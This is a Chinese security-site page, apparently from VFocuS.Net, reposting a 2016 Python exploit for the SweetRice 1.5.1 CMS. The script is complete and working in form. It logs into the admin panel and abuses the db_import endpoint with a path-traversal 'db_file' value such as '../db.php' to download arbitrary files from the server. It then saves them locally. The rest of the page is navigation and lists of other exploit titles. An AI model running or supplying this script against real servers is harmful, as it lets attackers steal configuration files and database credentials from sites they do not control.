首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 SweetRice 1.5.1 - Arbitrary File Download 来源：Ashiyane Digital Security Team 作者：Hosseini 发布时间：2016-11-04   #/usr/bin/python #-*- Coding: utf-8 -*- # Exploit Title: SweetRice 1.5.1 - Local File Inclusion # Exploit Author: Ashiyane Digital Security Team # Date: 03-11-2016 # Vendor: http://www.basic-cms.org/ # Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip # Version: 1.5.1 # Platform: WebApp - PHP - Mysql   import requests import os from requests import session   if os.name == 'nt':     os.system('cls') else:     os.system('clear')     pass banner = ''' +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ |  _________                      __ __________.__                    | | /   _____/_  _  __ ____   _____/  |\______   \__| ____  ____      | | \_____  \\ \/ \/ // __ \_/ __ \   __\       _/  |/ ___\/ __ \     | | /        \\     /\  ___/\  ___/|  | |    |   \  \  \__\  ___/     | |/_______  / \/\_/  \___  >\___  >__| |____|_  /__|\___  >___  >    | |        \/             \/     \/            \/        \/    \/     |                                                    |    > SweetRice 1.5.1 Local File Inclusion                            | |    > Script Cod3r : Ehsan Hosseini                                    | +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ '''   print(banner)     # Get Host & User & Pass & LfiPath host = input("Enter The Target URL(Example : localhost.com) : ") username = input("Enter Username : ") password = input("Enter Password : ") lfipath = input("Enter File To Download(Example : ../db.php) : ") xplfile = input("Enter Name of File To Save(Example : ../db.php) : ")   userinfo = {     'user':username,     'passwd':password,     'rememberMe':'' }   with session() as r:     login = r.post('http://' + host + '/as/?type=signin', data=userinfo)     success = 'Login success'     if login.status_code == 200:         print("[+] Sending User&Pass...")         if login.text.find(success) > 1:             print("[+] Login Succssfully...")         else:             print("[-] User or Pass is incorrent...")             print("Good Bye...")             exit()             pass         pass     dlfile = r.get('http://' + host + '/as/?type=data&mode=db_import&db_file=' + lfipath + '&form_mode=save')       if dlfile.status_code == 200:           print('[+] Exploit...')         file = open(xplfile, "w")         file.write(dlfile.text)         file.close()         print('[+] File Saved...')         print('[+] Exploit By Ehsan Hosseini')     else:         print("[-] Error in Exploting...")         pass   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Memcached 1.4.33 - PoC (3) ·Axessh 4.2 - Denial Of Service ·Memcached 1.4.33 - PoC (2) ·PCMan FTP Server 2.0.7 - 'ACCT ·Memcached 1.4.33 - PoC (1) ·IBM AIX 6.1/7.1/7.2.0.2 - 'lsm ·Rapid PHP Editor 14.1 - Remote ·IBM AIX 5.3/6.1/7.1/7.2 - 'lqu ·WinaXe 7.7 'FTP client' - Remo ·Freefloat FTP Server 1.0 - 'SI ·Microsoft Internet Explorer 11 ·PCMan FTP Server 2.0.7 - 'NLST   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved